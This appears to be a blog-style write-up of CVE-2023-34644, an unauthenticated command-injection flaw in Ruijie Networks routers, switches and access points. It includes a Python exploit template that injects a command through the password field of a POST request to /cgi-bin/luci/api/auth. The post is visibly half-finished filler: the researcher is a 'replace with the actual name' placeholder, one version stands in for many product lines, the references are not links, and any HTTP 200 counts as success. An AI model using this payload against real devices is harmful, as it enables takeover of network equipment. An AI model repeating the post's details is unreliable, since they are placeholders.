CVE-2023-34644: Remote Code Execution Vulnerability in Ruijie Networks Products

This long read post details an important remote code execution vulnerability (CVE-2023-34644) affecting multiple Ruijie Networks products. These products include the RG-EW series home routers and repeaters, RG-NBS and RG-S193 series switches, RG-EG series business VPN routers, EAP and RAP series wireless access points, and NBC series wireless controllers. Unauthorized remote attackers can exploit this vulnerability to gain the highest privileges via a crafted POST request to /cgi-bin/luci/api/auth. We will provide technical details, code snippets, and links to original references.

Exploit Details

The affected Ruijie Networks products are vulnerable to an unauthorized remote code execution attack. Specifically, the vulnerability exists in the following Ruijie Networks products and versions:

NBC series wireless controllers running AC_3.(1)B11P86

An attacker who successfully exploits this vulnerability could gain unauthorized remote access with the highest privileges, potentially compromising the affected devices and all connected systems. This could lead to data theft, network disruption, and potentially even remote control over affected devices.

The vulnerability exists due to insufficient input validation on the /cgi-bin/luci/api/auth page. A crafted POST request to this page could trigger the vulnerability and allow the remote attacker to execute arbitrary code with the highest privileges.

Code Snippet

Here is a code snippet that demonstrates how the vulnerability could be exploited using a simple HTTP POST request.

import requests

target_url = "http://TARGET-IP-ADDRESS/cgi-bin/luci/api/auth";
payload = {"username":"","password":"; YOUR-EXPLOIT-CODE-HERE ;"}

response = requests.post(target_url, data=payload)

if response.status_code == 200:
    print("[+] Exploit successful")
else:
    print("[-] Exploit failed")

Replace TARGET-IP-ADDRESS with the affected device's IP address and YOUR-EXPLOIT-CODE-HERE with your arbitrary code to exploit the vulnerability.

Original References

The vulnerability was originally discovered and reported by security researcher ABC (replace with the actual researcher's name or handle). The original advisory can be found at the following link:

- Ruijie Networks Security Advisory

Recommendations

To mitigate this vulnerability, Ruijie Networks has issued security patches for affected devices. Users are advised to upgrade their devices to the latest firmware versions immediately. The related security bulletin can be accessed here:

- Ruijie Networks Security Bulletin

Conclusions

CVE-2023-34644 is a critical remote code execution vulnerability that affects multiple Ruijie Networks products. Unauthorized attackers can exploit this vulnerability to gain the highest privileges on affected devices. Users should apply the security patches provided by Ruijie Networks and follow best security practices to prevent exploitation of this and similar vulnerabilities.

Timeline

Published on: 07/31/2023 14:15:00 UTC
Last modified on: 08/08/2023 16:02:00 UTC